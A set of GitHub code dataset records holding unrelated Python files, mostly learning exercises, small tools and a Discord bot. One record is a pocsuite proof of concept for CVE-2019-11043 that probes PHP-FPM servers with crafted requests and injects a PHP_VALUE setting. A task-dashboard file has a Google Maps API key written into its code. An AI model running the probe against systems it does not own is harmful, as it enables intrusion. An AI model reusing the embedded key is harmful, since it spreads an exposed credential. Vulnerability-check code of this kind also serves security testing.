Epoch: {}/{} Loss: {} Accuracy: {} Execution time: {}\".format(\\\n phase, epoch+1, epochs, epoch_loss, epoch_accuracy, (end_time-start_time)))\n \n # Save the model per save_every\n if epoch_loss<0.000405 or epoch % save_every == (save_every - 1) and epoch >= (10-1):\n checkpoint = { \n 'lr': initial_lr,\n 'b_s': batch_size,\n 'feat_type': feat_type,\n 'state_dict': model.state_dict()\n }\n save_name = \"checkpoint_\" + str(epoch+1) + '_epoch.pth'\n torch.save(checkpoint, os.path.join(save_dir, exp_ver, 'epoch_train', save_name))\n \nprint('Finishing training!')\n\n# Close visualization\nwriter.close()\n","repo_name":"callaunchpad/interact","sub_path":"cnn_baseline_weightedmultilabel.py","file_name":"cnn_baseline_weightedmultilabel.py","file_ext":"py","file_size_in_byte":13667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18900564999","text":"nombres = [\"juan\", \"maria\", \"pedro\"]\ncalificaciones = [9, 8, 6]\n\n# Crear diccionario de alumnos y calificaciones\nestudiantes = {\n \"juan\": 9,\n \"maria\": 8,\n \"pedro\": 6\n}\n\n# Accder a datos de un diccionario\nprint(\"La calificación de juan es: \" + str(estudiantes[\"juan\"]))\n\n# Añadir valores a un diccionario\nestudiantes[\"ana\"] = 10\n\n# actualizar valores de un diccionario\nestudiantes[\"pedro\"] = 10\n\n# Empezar con un diccionario vacío / y estructura de datos\nestadisticas = {}\nestadisticas[\"dari\"] = [10, 561241, 5412, 42135213]\nestadisticas[\"abel\"] = [23, 213, 321, 31223]\n\"\"\"\n{\n \"dari\": [10, 561241, 5412, 42135213], \n \"abel\": [23, 213, 321, 31223]\n}\n\"\"\"\nprint (estadisticas)\n\n# Diccionarios dentro de diccionario\nestadisticas = {}\nestadisticas[\"dari\"] = {\n \"viwers\": 100,\n \"comentarios\": 200,\n \"likes\": 300\n}\nestadisticas[\"abel\"] = {\n \"viwers\": 1213,\n \"comentarios\": 213523,\n \"likes\": 1235\n}\nprint (estadisticas)\nprint ()\n\n# Remover elementos de un diccionario\ndel estadisticas[\"abel\"]\nprint (estadisticas)\nprint ()\n\n# Actualizar valores anidados\nestadisticas[\"dari\"][\"viwers\"] = \"10000\"\nprint (estadisticas)","repo_name":"darideveloper/cursos-y-clases","sub_path":"Gustavo/fundamentos de python/6_dicionarios/gestionar_diccionarios.py","file_name":"gestionar_diccionarios.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"13514321596","text":"# Escreva um programa que leia um número n inteiro qualquer e mostre na tela os n primeiros elementos de uma Sequência de FIBONACCI. Ex. 0-> 1-> 1-> 2-> 3-> 5-> 8\n\nprint('\\033[34m-=-'*5, '\\033[36m SEQUÊNCIA DE FIBONACCI \\033[m', '\\033[34m--=-'*5, '\\033[m')\nn = int(input('Quantos termos voce quer vê? '))\n\nt1 = 0 # termos iniciais fixos (de acordo com a teoria)\nt2 = 1\ncontador = 3 # começa do 3 , pq o primeiro e o segundo ja foram\nprint('~'*50)\nprint('{} -> {}'.format(t1, t2), end='')\nwhile contador <= n:\n t3 = t1 + t2 \n print(' -> {}'.format(t3), end='')\n t1 = t2 # deslocando os termos\n t2 = t3 \n contador += 1\nprint(' -> FIM') \nprint('~'*50)","repo_name":"mercedesDiniz/Basic_Python","sub_path":"Exercicios/ex063.py","file_name":"ex063.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38622975190","text":"import classs\ndef number(a,ans,flag):\n\tif flag==0:\n\t\tans=ans+\" \"+a\n\telse:\n\t\tans=ans+a\n\treturn ans\ndef co(a):\n\tif a==-1:\n\t\treturn 1\n\telif a==\"(\":\n\t\treturn 2\n\telif a==\"+\" or a==\"-\":\n\t\treturn 3\n\telif a==\"*\" or a==\"/\" or a==\"%\":\n\t\treturn 4 \ndef operator(a,ans):\n\tif(a=='('):\n\t\ts.push(a)\n\telif(a==')'):\n\t\twhile(s.seek()!='('):\n\t\t\tans=ans+\" \"+s.pop()\n\t\ta=s.pop()\n\telse:\n\t\tb=s.seek()\n\t\tif co(a)>co(b):\n\t\t\ts.push(a)\n\t\telse:\n\t\t\twhile(co(a)<=co(s.seek())):\n\t\t\t\tans=ans+\" \"+s.pop()\n\t\t\ts.push(a)\n\treturn ans\ndef intopo(a,ans,flag):\n\tn=len(a)\n\tfor i in range(n):\n\t\t\n\t\tif a[i]>='0' and a[i]<='9':\n\t\t\tans=number(a[i],ans,flag)\n\t\t\tflag=1\n\t\telse:\n\t\t\tans=operator(a[i],ans)\n\t\t\tflag=0\n\t\t\n\twhile(s.seek()!=-1):\n\t\tans=ans+\" \"+s.pop()\n\treturn ans\ns=classs.stack()\n","repo_name":"akshayanagaraj/Calculator","sub_path":"infixtopostfix.py","file_name":"infixtopostfix.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72867819641","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nwith open('numbers.txt', 'w') as f:\n # s1 = np.random.gamma(2, 1, 10**5*2//3)\n # s2 = np.random.gamma(7.5, 1, 10**5//3)\n\n # s = s1.tolist() + s2.tolist()\n\n s1 = np.random.normal(1000, 250, 10**5*6//10)\n s2 = np.random.normal(400, 200, 10**5*3//10)\n s3 = np.random.normal(100, 60, 10**5//10)\n\n s = s1.tolist() + s2.tolist() + s3.tolist()\n np.random.shuffle(s)\n\n count, bins, ignored = plt.hist(s, bins=20, density=True)\n plt.show()\n for i in s:\n f.write(f'{i:.3f}\\n')\n\n","repo_name":"da-frog/sea-freight-shipping","sub_path":"scripts/generate_commodity_size_weights.py","file_name":"generate_commodity_size_weights.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11068320583","text":"import matplotlib.pyplot as plt\nimport time\nimport serial\nimport pygame\nimport numpy as np\npygame.init()\n\n#open com\nser = serial.Serial('COM3',9600)\n\n#colors\nbak_color = (100,200,0)\nred = (200,0,0)\nblue = (0,200,240)\n\n#screen demensions\nscreen_width = 1200\nscreen_height = 790\n\n#create display\npygame.display.set_caption('fineass')\ndisplay = pygame.display.set_mode((screen_width,screen_height))\n\n#ancor\nmid_x = []\nmid_y = []\nfor i in range(100):\n mid_x.append(screen_width/2)\n mid_y.append(screen_height/2)\nang = 0\ndist = 0\ncount = 0\n\nrun = True\nwhile run:\n #dellay and screen reset\n pygame.time.delay(30)\n display.fill(bak_color)\n \n #increase count\n count = count+1\n if count > len(mid_x)-1:\n count = 0\n #read serial\n st = ser.readline()\n \n if ser.readline()[:] != \"b'\\xff37\\r\\n'\": # Make sure that the read line isn't this as this is the first line outputted from the serial and it causes errors in the code\n b = ser.readline() # read a byte string line from the Arduino's serial output\n string_n = b.decode() # decode byte string into regular Python string\n int_b = float(string_n)\n \n #seperate data\n if int_b > 10000:\n ang = (int_b-10000)*np.pi/180\n elif int_b < 10000:\n if int_b < 1300:\n dist = int_b\n else:\n dist = 1300\n \n \n #draw circles\n try:\n mid_x[count] = screen_width/2+dist*np.cos(ang)/3\n mid_y[count] = screen_height/2-dist*np.sin(ang)/3\n except:\n print(count)\n \n #target\n pygame.draw.circle(display, blue, (int(screen_width/2), int(screen_height/2)), 15, 15)\n pygame.draw.circle(display, blue, (int(screen_width/2), int(screen_height/2)), 200, 100)\n pygame.draw.circle(display, blue, (int(screen_width/2), int(screen_height/2)), 400, 100)\n pygame.draw.circle(display, blue, (int(screen_width/2), int(screen_height/2)), 600, 100)\n \n #distances\n for i in range(6):\n if i != 2 and i != 4 and i != 0:\n OUT = str(100*i)+'mm'\n font = pygame.font.Font('freesansbold.ttf', 20)\n text = font.render(OUT, True, bak_color, blue)\n textRect = text.get_rect()\n textRect.center = (screen_width/2, screen_height/2-10-100*i)\n display.blit(text, textRect) \n elif i == 0:\n OUT = str(100*i)\n font = pygame.font.Font('freesansbold.ttf', 20)\n text = font.render(OUT, True, bak_color, blue)\n textRect = text.get_rect()\n textRect.center = (screen_width/2, screen_height/2)\n display.blit(text, textRect)\n else:\n OUT = str(100*i)+'mm'\n font = pygame.font.Font('freesansbold.ttf', 20)\n text = font.render(OUT, True, blue, bak_color)\n textRect = text.get_rect()\n textRect.center = (screen_width/2, screen_height/2-10-100*i)\n display.blit(text, textRect) \n \n #draw objs \n for i in range(len(mid_x)):\n pygame.draw.circle(display, red, (int(mid_x[i]), int(mid_y[i])), 5, 5)\n \n #update screen\n pygame.display.update()\n \n #quite\n for event in pygame.event.get() : \n if event.type == pygame.QUIT : \n pygame.quit() \n run = False\n ser.close()","repo_name":"wrafaelharr/Python_projects","sub_path":"self_driving_rc_car/python for scanner/python scanner read.py","file_name":"python scanner read.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8744884258","text":"\r\nfrom sympy import *\r\n\r\nx, y, z = symbols('x y z')\r\n\r\n#Система уравнений\r\nf1 = x * y + y * z - 8\r\nf2 = y * z + z * x - 9\r\nf3 = z * x + x * y - 5\r\n\r\n#Диффернцируем обе функции по х и по у\r\nf1x, f1y, f1z = diff(f1, x), diff(f1, y), diff(f1, z)\r\nf2x, f2y, f2z = diff(f2, x), diff(f2, y), diff(f2, z)\r\nf3x, f3y, f3z = diff(f3, x), diff(f3, y), diff(f3, z)\r\n\r\n#Находим определители\r\nd = (f1x * f2y * f3z) + (f1y * f2z * f3x) + (f2x * f3y * f1z) - (f3x * f2y * f1z) - (f2x * f1y * f3z) - (f2z * f3y * f1x)\r\ndx = (f1 * f2y * f3z) + (f1y * f2z * f3) + (f2 * f3y * f1z) - (f3 * f2y * f1z) - (f2 * f1y * f3z) - (f2z * f3y * f1)\r\ndy = (f1x * f2 * f3z) + (f1 * f2z * f3x) + (f2x * f3 * f1z) - (f3x * f2 * f1z) - (f2x * f1 * f3z) - (f2z * f3 * f1x)\r\ndz = (f1x * f2y * f3) + (f1y * f2 * f3x) + (f2x * f3y * f1) - (f3x * f2y * f1) - (f2x * f1y * f3) - (f2 * f3y * f1x)\r\n\r\nxi, yi, zi = 0.5, 0.5, 0.5\r\ne = 1\r\nwhile e > 0.01:\r\n #фактические значения определителей\r\n dxi = dx.evalf(subs={'x':xi, 'y':yi, 'z':zi})\r\n dyi = dy.evalf(subs={'x':xi, 'y':yi, 'z':zi})\r\n dzi = dz.evalf(subs={'x': xi, 'y': yi, 'z': zi})\r\n di = d.evalf(subs={'x':xi, 'y':yi, 'z':zi})\r\n #уточнение решения заданной системы\r\n xi = xi - dxi / di\r\n yi = yi - dyi / di\r\n zi = zi - dzi / di\r\n e = max(dxi, dyi, dzi)\r\n\r\nprint(xi, yi, zi)","repo_name":"Richdeg/die-Hausaufgaben","sub_path":"lab5(1).py","file_name":"lab5(1).py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19153591869","text":"from random import *\nfrom datetime import *\n\ndef get_date() : # 랜덤 날짜 생성 함수\n start = date(2010, 10, 1) # 2010.10.1을 시작일로 변수에 저장\n today = datetime.today() # 오늘 날짜를 변수에 저장\n end = date(today.year, today.month, today.day) # 오늘 날짜의 시간을 제외한 년월일만 end 변수에 저장\n random_date = start + (end - start) * random() # end 날짜에서 start 날짜 사이의 랜덤 날짜 생성\n return random_date # 생성된 랜덤 날짜 return\n\n\ndef get_weekday(date: date) :\n date_dict = {0: 'Mon.', 1:'Tue.', 2:'Wed.', 3:'Thu.', 4:'Fri.', 5:'Sat.', 6:'Sun.'} # 요일을 dictionary 에 저장\n return date_dict[date.weekday()] # date의 요일을 return (weekday()는 요일에 따라 월~일을 0~6으로 return 해주는 datetime 모듈의 내장 함수)\n\nnames = []\nbirth_days = []\nopt = False\nwhile True :\n while not opt : # opt 가 False 면 실행\n inputs = input(\"Enter names seperated by comma: \").split(\",\") # ','를 기준으로 split\n for i in inputs :\n i = i.strip() # 좌우 공백 제거\n if i != \"\" and not i in names : # 공백이 아니면 names에 append\n names.append(i) \n \n print(\"Valid names received are \", names)\n \n if len(names) > 2 : # names에 저장된 이름의 갯수가 2보다 크면 break\n break\n else : # names에 저장된 이름의 갯수가 2보다 작거나 같으면 에러 메시지 출력\n print(\"The number of valid names is less than 3.\")\n\n if not opt : # opt가 False면 실행\n print(\"*\" * 30)\n for i in range(len(names)) :\n birth_days.append(get_date()) # 랜덤 날짜를 생일로 저장\n print(names[i], '\\t', birth_days[i]) # 데이터 출력\n print(\"*\" * 30)\n\n u_index = -1 # user가 고르는 이름의 index 저장 변수\n c_index = -1 # computer가 고르는 이름의 index 저장 변수\n while True :\n character = input(\"Please choose your character among %s:\" % names) # 이름 입력 받기\n \n if character in names : # 유효한 이름이면\n u_index = names.index(character) # u_index에 해당 이름의 index 저장\n break\n \n c_index = randrange(0, len(names)) # c_index에 0 ~ (names의 길이 -1) 값 사이에 있는 값 랜덤으로 저장\n print(\"You have chosen %s born in %s (%s)\" % (names[u_index], birth_days[u_index], get_weekday(birth_days[u_index]))) # u_index에 해당하는 데이터 출력\n print(\"The computer has chosen %s born in %s (%s)\" % (names[c_index], birth_days[c_index], get_weekday(birth_days[c_index]))) # c_index에 해당하는 데이터 출력\n \n result_str = \"\" # 결과 출력에 해당하는 문자열 변수\n if c_index == u_index : # u_index 와 c_index 가 같으면 같다고 출력\n print(\"They are same person.\")\n else : # u_index와 c_index가 다른 값이면 실행\n if birth_days[u_index] < birth_days[c_index] : # u_index의 해당하는 생일 날짜가 더 옛날이면 u_index가 order\n result_str = \"order than\" # result_str에 order than 저장\n elif birth_days[u_index] > birth_days[c_index] : # u_index의 해당하는 생일 날짜가 더 최근이면 u_index가 younger\n result_str = \"younger than\" # result_str에 younger than 저장\n else :\n result_str = \"the same age as\" # 같은 날짜면 the same age as 저장\n \n print(\"%s is %s %s.\" % (names[u_index], result_str, names[c_index])) # 결과 출력\n \n if \"y\" == input(\"Do you want to play again? (y):\") : # 입력 값이 'y'면 opt 값을 True로 변경\n opt = True\n else : # 입력 값이 'y'가 아니면 break\n break\n\n","repo_name":"Ohgyuchan/cs-study","sub_path":"python/python_class/21700443_OhGyuchan_hw2.py","file_name":"21700443_OhGyuchan_hw2.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11653987451","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom pocsuite.api.poc import register\nfrom pocsuite.api.poc import Output, POCBase\nfrom urlparse import urlparse,urljoin\nfrom pocsuite.api.utils import randomStr\nfrom pocsuite.api.request import req\nimport socket\n\nclass PhpUip():\n def __init__(self, url):\n self.MinQSL = 1500\n self.MaxQSL = 1950\n self.url = url\n self.BreakingPayload = \"/PHP%0Ais_the_shittiest_lang.php\"\n self.PossibleQSLs = []\n self.MaxPisosLength = 256\n self.qslandpisos = None\n \n def get_baseStatus(self):\n target = self.url + \"/path%0Ainfo.php?{}\".format('Q'*(self.MinQSL-1))\n self.baseStatus = req.get(target).status_code\n \n def get_qsl(self):\n for qsl in range(self.MinQSL, self.MaxQSL, 5):\n resp = req.get(self.url + self.BreakingPayload + \"?\" + \"Q\"*(qsl-1))\n if resp.status_code != self.baseStatus:\n self.PossibleQSLs = [qsl, qsl - 5 , qsl - 10]\n \n def SanityCheck(self):\n header = {\n \"D-Pisos\": \"8{}D\".format(\"=\"*self.MaxPisosLength)\n }\n for _ in range(10):\n if req.get(self.url + \"/PHP%0ASOSAT?\" + \"Q\"*(self.MaxQSL - 1), headers = header).status_code == self.baseStatus:\n pass\n else:\n return False\n return True\n \n def get_pisos(self):\n host = urlparse(self.url).hostname\n port = urlparse(self.url).port\n for qsl in self.PossibleQSLs:\n for pisos in range(self.MaxPisosLength):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n head = \"GET /index.php/PHP_VALUE%0Asession.auto_start=1;;;?{} HTTP/1.1\\r\\n\".format(\"Q\"*(qsl-1))\n head += \"Host: {}:{}\\r\\n\".format(host, str(port))\n head += \"User-Agent: Mozilla/5.0\\r\\n\"\n head += \"D-Pisos: 8{}D\\r\\n\".format(\"=\"*pisos)\n head += \"Ebut: mamku tvoyu\\r\\n\\r\\n\"\n s.connect((host, port))\n s.send(head)\n recv = s.recv(1024)\n if \"PHPSESSID\" in recv and \"path=\" in recv:\n self.qslandpisos = (qsl, pisos)\n return\n s.close()\n\n def poc(self):\n self.get_baseStatus()\n self.get_qsl()\n if self.PossibleQSLs:\n if self.SanityCheck():\n self.get_pisos()\n if self.qslandpisos:\n return True\n return False\n\n\n\nclass TestPOC(POCBase):\n vulID = 'N/A' # ssvid\n version = '1.0'\n author = 'fairy'\n vulDate = ''\n createDate = ''\n updateDate = ''\n references = ['']\n name = ''\n appPowerLink = ''\n appName = ''\n appVersion = ''\n vulType = ''\n desc = ''' \n '''\n samples = ['']\n install_requires = ['']\n def _verify(self):\n result = {}\n test = PhpUip(self.url + '/index.php')\n\n if test.poc():\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n\n return self.parse_output(result)\n\n\n _attack = _verify\n\n \n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('Internet nothing returned')\n return output\n\nregister(TestPOC)\n","repo_name":"20142995/pocsuite","sub_path":"poc/CVE-2019-11043.py","file_name":"CVE-2019-11043.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"34533354680","text":"import os\nimport json\nimport csv\nimport googlemaps\nfrom datetime import datetime\n\n\nclass OpenFile:\n\n def __init__(self, filename, mode):\n self._file = open(filename, mode)\n\n def __enter__(self):\n return self._file\n\n def __exit__(self, type, value, traceback):\n self._file.close()\n return True\n\nclass Maps:\n\n def __init__(self, key):\n self._client = googlemaps.Client(key=key)\n\n def __enter__(self):\n return self._client\n\n def __exit__(self, error_type, value, traceback):\n del self._client\n return True\n\nclass Task:\n\n def __init__(self, title, priority = 1):\n self.done = False\n self.title = title\n self.priority = priority\n self.location = None\n\n def __str__(self):\n return self.title\n\n @property\n def priority(self):\n return self._priority\n\n @priority.setter\n def priority(self, value):\n if int(value) in range(1, 11):\n self._priority = value\n else:\n raise ValueError('Priority value is out of range')\n\n def add_location(self):\n place_lookup = input('Enter location name: \\t')\n with Maps(key='AIzaSyDZUTx1HWrOcNDng1V7-smaaHTBSobrw0I') as gmaps:\n place = gmaps.find_place(\n place_lookup,\n 'textquery',\n fields=['geometry/location', 'name', 'place_id']\n )\n if place['status'] == 'OK':\n self.location = {\n 'coordinates': place['candidates'][0]['geometry']['location'],\n 'name': place['candidates'][0]['name'],\n 'google_id': place['candidates'][0]['place_id']\n }\n\n\nclass Dashboard:\n\n def __init__(self):\n self.task_list = []\n\n def add_task(self):\n title = input('Task name: ')\n priority = input('Priority: ')\n new_task = Task(title, priority)\n self.task_list.append(new_task)\n\n def print_all_tasks(self):\n for task in self.task_list:\n print(task)\n\n def print_all_tasks_by_priority(self, temp_priority):\n temp_list = []\n for task in self.task_list:\n if temp_priority == task.priority:\n temp_list.append(task.title)\n return temp_list\n\n def sort_by_title(self):\n return sorted(self.task_list,\n key=lambda task: task.title)\n\n\n\n def dump_to_json(self, filename):\n task_list = [t.__dict__ for t in self.task_list]\n filepath = os.path.join(os.getcwd(),'data', filename)\n with OpenFile(filepath, 'w') as dump_file:\n json.dump(task_list, dump_file)\n\n def load_from_json(self, filename):\n filepath = os.path.join(os.getcwd(), 'data', filename)\n with OpenFile(filepath, 'r+') as dump_file:\n json.load(dump_file)\n\n def dump_csv(self, filename):\n task_list = [t.__dict__ for t in self.task_list]\n\n fieldnames = []\n for task in task_list[0]:\n fieldnames.append(task)\n\n filepath = os.path.join(os.getcwd(),'data', filename)\n with OpenFile(filepath, 'w') as file:\n writer = csv.writer(file)\n writer.writerow(fieldnames)\n for task in task_list:\n temp_list = []\n for task_property in task.values():\n temp_list.append(task_property)\n writer.writerow(temp_list)\n\n\n def load_csv(self, filename):\n filepath = os.path.join(os.getcwd(), 'data', filename)\n with OpenFile(filepath, 'r') as file:\n csv.reader(file, delimiter=',')\n\n\nif __name__ == '__main__':\n dashboard_1 = Dashboard()\n dashboard_1.add_task()\n dashboard_1.add_task()\n dashboard_1.dump_csv('proba.csv')\n dashboard_1.load_csv('proba.csv')\n\n\n","repo_name":"kseniajasko/Python_study_group_2","sub_path":"hw_16_10/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42216852785","text":"import sys\nimport os\n\n# os.chdir(\"C:\\\\python\\\\algorithm exam\")\n# sys.stdin = open(\"input.txt\", \"r\")\n\ndef DFS(L, tot, day):\n global max_p\n if day>n:\n return\n if L == n+1:\n if tot>max_p:\n max_p = tot\n return\n if L > day:\n DFS(L+1, tot+sch[L][1], day+sch[L][0])\n DFS(L+1, tot, day+1)\n else:\n DFS(L+1, tot, day) \n\n\nif __name__ == \"__main__\":\n n = int(input())\n sch = [list(map(int, input().split())) for _ in range(n)]\n sch.insert(0,0)\n max_p = 0\n DFS(1, 0, 0)\n print(max_p)\n\n\n# # 해답 코드\n# def DFS(L, tot):\n# global max_p\n# if L > n+1:\n# return\n\n# if L == n+1:\n# if tot>max_p:\n# max_p = tot\n# return\n \n# DFS(L+sch[L][0], tot+sch[L][1])\n# DFS(L+1, tot)\n\n# if __name__ == \"__main__\":\n# n = int(input())\n# sch = [list(map(int, input().split())) for _ in range(n)]\n# sch.insert(0,0)\n# max_p = 0\n# DFS(1, 0)\n# print(max_p)\n","repo_name":"godew/practice-repository","sub_path":"algorithm/python/algorithm exam/7. DFS, BFS 활용/2. 휴가(DFS).py","file_name":"2. 휴가(DFS).py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70592316600","text":"# 1 1 2 2 3 3 3 3\n# l m r\n# l m r\n# m\n# r l\n\ndef search_l(nums: list[int], target: int) -> list[int]:\n l, r = 0, len(nums) - 1\n\n while l <= r:\n m = (l + r) // 2\n\n if nums[m] >= target:\n r = m - 1\n else:\n l = m + 1\n \n return l\n\n\nclass Solution:\n def searchRange(self, nums: list[int], target: int) -> list[int]:\n if not nums:\n return [-1, -1]\n \n l = search_l(nums, target)\n r = search_l(nums, target + 1)\n \n if l >= len(nums) or nums[l] != target:\n return [-1, -1]\n\n return [l, r - 1]","repo_name":"chehsunliu/a","sub_path":"LeetCode/0034_find-first-and-last-position-of-element-in-sorted-array/20220716-2.py","file_name":"20220716-2.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72745394681","text":"import sys, os\nimport cv2\nimport urllib\nimport shutil\n\nfrom Tkinter import *\nfrom os import walk\nfrom urlparse import urlparse\n\nclass Face:\n\n def detect(self,path):\n img = cv2.imread(path)\n cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_alt.xml\")\n rects = cascade.detectMultiScale(img, 1.01, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))\n\n if len(rects) == 0:\n return [], img\n rects[:, 2:] += rects[:, :2]\n return rects, img\n\n def box(self,rects, img, file_name,folder):\n\n i = 0 # Track how many faces found\n printLabel = \"thisLabel\"\n for x1, y1, x2, y2 in rects:\n i += 1 \n # Increment the face counter\n #print \"Found \" + str(i) + \" face!\" # Tell us what's going on\n cut = img[y1:y2, x1:x2] # Defines the rectangle containing a face\n file_name = file_name.replace('.jpg','_') # Prepare the filename \n file_name = file_name + str(i) + '.jpg'\n file_name = file_name.replace('\\n','')\n printLabel = 'Writing ' + file_name\n\n cv2.imwrite('detected/'+ str(folder)+'/'+ str(file_name), cut) # Write the file\n return printLabel\n \n \nif __name__ == \"__main__\":\n main()","repo_name":"filipinacoder/face-recognition-system","sub_path":"Face.py","file_name":"Face.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43340121529","text":"from django.contrib import admin\nfrom edc_model_admin import audit_fieldset_tuple\n\nfrom ..admin_site import flourish_child_admin\nfrom ..forms import ChildPennCNBForm\nfrom ..models import ChildPennCNB\nfrom .model_admin_mixins import ChildCrfModelAdminMixin\n\n\n@admin.register(ChildPennCNB, site=flourish_child_admin)\nclass ChildPennCNBAdmin(ChildCrfModelAdminMixin, admin.ModelAdmin):\n\n form = ChildPennCNBForm\n\n fieldsets = (\n (None, {\n 'fields': [\n 'child_visit',\n 'report_datetime',\n 'completed',\n 'reason_incomplete',\n 'reason_other',\n 'date_deployed',\n 'start_time',\n 'stop_time',\n 'staff_assisting',\n 'testing_impacted',\n 'impact_other',\n 'claim_experience',\n 'laptop_used',\n 'comments'\n ]}\n ), audit_fieldset_tuple)\n\n filter_horizontal = ('staff_assisting', )\n\n radio_fields = {'completed': admin.VERTICAL,\n 'reason_incomplete': admin.VERTICAL,\n 'testing_impacted': admin.VERTICAL,\n 'laptop_used': admin.VERTICAL,\n 'claim_experience': admin.VERTICAL, }\n","repo_name":"flourishbhp/flourish-child","sub_path":"flourish_child/admin/child_penn_cnb_admin.py","file_name":"child_penn_cnb_admin.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33535359296","text":"import requests\nimport bs4\nfrom urllib.error import HTTPError,URLError\nimport lxml\nfrom requests.exceptions import ConnectionError\nimport re\nimport io\n\n\ndef urlopen(url):\n try:\n data = requests.get(url)\n\n except HTTPError as e:\n print(e)\n\n except URLError as e:\n print(e)\n\n except ConnectionError as e:\n print(e)\n\n return data\n\n\n\ndata = urlopen(\"https://www.netmeds.com/prescriptions\")\n\nfdata = bs4.BeautifulSoup(data.text , \"lxml\")\n# print(fdata)\n\n \n\n# a = fdata.select(\".drug-list-col\")\na =fdata.find(\"div\",{\"class\":\"drug-list-col\"})\n# a =fdata.find(\"div\",{\"class\":\"ln-a\"})\n\n# a_list = a.select(\".alpha-drug-list\")\n# a = fdata.select(\".drug-list-col ln-a\")\n# print(a.get_text())\n# a_list = a.select(\".alpha-drug-list\")\n# print(a_list)\n\n# b = fdata.find(\"div\",{\"class\":\"drug-list-col\"})\n\n\n# print(b)\n\n\ndef degit_remove(item):\n\n dj = ['1','2','3','4','5','6','7','8','9',')','(','0']\n answer = ''\n for char in item :\n if char not in dj :\n answer += char\n\n return answer\n\n\n\nb = fdata.find_all(\"ul\",{\"class\":\"alpha-drug-list\"})\nl=[]\nfor item in b:\n for med in item:\n name = med.get_text()\n l.append(name)\n\n# print(l)\nnew =[]\nfor item in l:\n x = degit_remove(item).strip()\n new.append(x)\n\nwith io.open(\"file1.csv\",\"w\",encoding=\"utf8\") as f1:\n f1.write(\"MEDICINE DETAILS \\n\")\n\n\n# print(new)\nall =[]\n\n\nfor item in new :\n \n x = item\n\n new_url = \"https://www.netmeds.com/prescriptions/\"+item \n new_data = urlopen(new_url)\n fnew_data = bs4.BeautifulSoup(new_data.text , 'lxml')\n \n all_tab = fnew_data.find_all(\"ul\",{\"class\":\"alpha-drug-list\"})\n s =[] \n for item in all_tab:\n for med in item:\n name = med.find(\"div\",{\"class\":\"panel-body\"})\n\n with io.open(\"file1.csv\",\"a\",encoding=\"utf-8\") as f1:\n\n f1.write(x + \"\\n\")\n f1.write(name.get_text() + \"\\n\")\n \n\n # print(name.get_text())\n \n# print(s)\n# all.append(s)\n# print(\"done\")\n\n# print(all)\n\n\n\n\n \n","repo_name":"adarshraj365/Scraping-to-netmeds.com","sub_path":"netmeds.py","file_name":"netmeds.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"281194693","text":"#Import modules and connect to Discord\nimport os\nimport discord\nimport random\nfrom dotenv import load_dotenv\n\n\n# Getting motivational quotes ready\nwith open(\"motivation.csv\") as motivation:\n quotes = []\n for line in motivation:\n line = line.replace(\"\\n\", \"\")\n line = line.replace('\"',\"\")\n line = line.split(\"—\")\n quotes.append([x.strip() for x in line])\n\n\n\n\n#Getting the token and guild name from the .env\nload_dotenv()\nTOKEN = os.getenv(\"DISCORD_TOKEN\")\nGUILD = os.getenv('DISCORD_GUILD')\n\n#https://stackoverflow.com/questions/64231025/discord-py-bot-cant-see-members\nintents = discord.Intents.default()\nintents.members = True\n\nclient = discord.Client(intents=intents)\n\n@client.event\nasync def on_ready():\n print(f'{client.user.name} has connected to Discord!')\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n \n if message.content.lower() == '!motivation':\n random_quote = random.choice(quotes)\n response = f\"{random_quote[0]} - {random_quote[1]}\"\n await message.channel.send(response)\n \n elif message.content == 'raise-exception':\n raise discord.DiscordException\n\nclient.run(TOKEN)\n\n\n\n\n\n","repo_name":"patricklec/discord_motivation_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9586310881","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n @File: ANet.py\n @Author: Milo\n @Date: 2022/05/30 